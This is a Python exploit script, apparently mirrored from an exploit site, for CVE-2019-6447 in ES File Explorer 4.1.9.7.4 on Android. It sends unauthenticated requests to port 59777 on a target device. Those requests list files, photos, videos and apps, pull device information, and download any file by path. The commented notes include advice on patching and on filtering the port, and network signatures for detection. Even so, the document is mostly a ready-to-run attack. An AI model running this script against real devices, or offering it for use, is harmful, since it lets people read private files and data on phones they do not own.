## https://sploitus.com/exploit?id=PACKETSTORM:163303
# Exploit Title: ES File Explorer 4.1.9.7.4 - Arbitrary File Read  
# Date: 29/06/2021  
# Exploit Author: Nehal Zaman  
# Version: ES File Explorer v4.1.9.7.4  
# Tested on: Android  
# CVE : CVE-2019-6447  
  
import requests  
import json  
import ast  
import sys  
  
# A command and a target address are both mandatory; the file path is only
# needed by the getFile command and is checked later.
if not len(sys.argv) >= 3:
    print(f"USAGE {sys.argv[0]} <command> <IP> [file to download]")
    sys.exit(1)
  
# Base URL of the plain-HTTP service on the target; the port is fixed at 59777.
# Defensive note: the exposure is that this port is reachable from other hosts
# on the network. Devices running the affected version named in the header
# should have the app updated or removed, and TCP 59777 filtered between
# client devices.
url = f"http://{sys.argv[2]}:59777"
cmd = sys.argv[1]

# Every command name this script accepts. Order matters: the first nine are the
# list-type commands, index 9 is getFile and index 10 is getDeviceInfo.
cmds = [
    'listFiles',
    'listPics',
    'listVideos',
    'listAudios',
    'listApps',
    'listAppsSystem',
    'listAppsPhone',
    'listAppsSdcard',
    'listAppsAll',
    'getFile',
    'getDeviceInfo',
]
listCmds = cmds[:9]

# Reject anything outside the known command set and show the help text.
if cmd not in cmds:
    print(
        "[-] WRONG COMMAND!",
        "Available commands : ",
        " listFiles : List all Files.",
        " listPics : List all Pictures.",
        " listVideos : List all videos.",
        " listAudios : List all audios.",
        " listApps : List Applications installed.",
        " listAppsSystem : List System apps.",
        " listAppsPhone : List Communication related apps.",
        " listAppsSdcard : List apps on the SDCard.",
        " listAppsAll : List all Application.",
        " getFile : Download a file.",
        " getDeviceInfo : Get device info.",
        sep="\n",
    )
    sys.exit(1)
  
# Startup banner, printed once the arguments have been accepted.
print(
    "\n==================================================================",
    "| ES File Explorer Open Port Vulnerability : CVE-2019-6447 |",
    "| Coded By : Nehal a.k.a PwnerSec |",
    "==================================================================\n",
    sep="\n",
)

# The only header sent with command requests: the body is declared as JSON.
# No credential or session header is included.
header = {"Content-Type": "application/json"}

# Local intercepting-proxy settings. NOTE(review): none of the requests calls
# visible in this listing passes this dict, so it currently has no effect.
proxy = {
    "http": "http://127.0.0.1:8080",
    "https": "https://127.0.0.1:8080",
}
  
def httpPost(cmd):
    """Send one command to the target service and return the parsed reply.

    The command name is wrapped as ``{"command": cmd}``, serialised to JSON and
    POSTed to the module-level ``url`` with the module-level ``header``. The
    request carries no authentication material. On the wire this is a
    plain-HTTP POST to TCP 59777 with a JSON body holding a ``command`` key,
    which is the pattern a network monitor would see.

    Returns whatever Python literal the reply text evaluates to.
    """
    payload = json.dumps({"command": cmd})
    reply = requests.post(url, headers=header, data=payload)
    # NOTE(review): the reply text is supplied by the remote device and is
    # parsed as a Python literal rather than as JSON. literal_eval does not run
    # code, but very large or deeply nested input can exhaust memory or hit the
    # recursion limit. The status code is not checked and no timeout is set, so
    # a peer that never answers blocks the script indefinitely.
    return ast.literal_eval(reply.text)
  
def parse(text, keys):
    """Print the selected fields of every record in *text*.

    Each record produces one ``key : value`` line per entry in *keys*, in the
    order given, followed by a blank separator line. Every record is indexed
    with every key, so a dict record that lacks one of them raises KeyError.
    Nothing is returned.
    """
    for record in text:
        for field in keys:
            value = record[field]
            print(f"{field} : {value}")
        # Blank line between records.
        print('')
  
def do_listing(cmd):
    """Run a list-type command and print every field of every returned record.

    The reply from ``httpPost`` is treated as a sequence of dict records. The
    field names come from the first record only and are then applied to all
    records by ``parse``; an empty reply prints nothing.
    """
    records = httpPost(cmd)
    # Column names are taken from the first record; later records are assumed
    # to carry the same keys.
    keys = list(records[0].keys()) if len(records) != 0 else []
    parse(records, keys)
  
# Dispatch on the validated command name.
if cmd in listCmds:
    # Any of the nine list-type commands: fetch and print the records.
    do_listing(cmd)

elif cmd == cmds[9]:
    # getFile: needs exactly one extra argument, an absolute path on the device.
    if len(sys.argv) != 4:
        print("[+] Include file name to download.")
        sys.exit(1)
    if sys.argv[3][0] != '/':
        print("[-] You need to provide full path of the file.")
        sys.exit(1)
    path = sys.argv[3]
    print("[+] Downloading file...")
    # The file is requested with a plain GET of the absolute path on the same
    # port, so in network logs it appears as a GET for a filesystem path on
    # TCP 59777.
    response = requests.get(url + path)
    # NOTE(review): the body is saved without checking the status code, so an
    # error reply would be stored as if it were the file. Mode 'wb' overwrites
    # any existing out.dat in the current directory.
    with open('out.dat', 'wb') as wf:
        wf.write(response.content)
    print("[+] Done. Saved as `out.dat`.")

elif cmd == cmds[10]:
    # getDeviceInfo: the reply is used as a single mapping, printed field by field.
    response = httpPost(cmd)
    keys = list(response.keys())
    for key in keys:
        print(f"{key} : {response[key]}")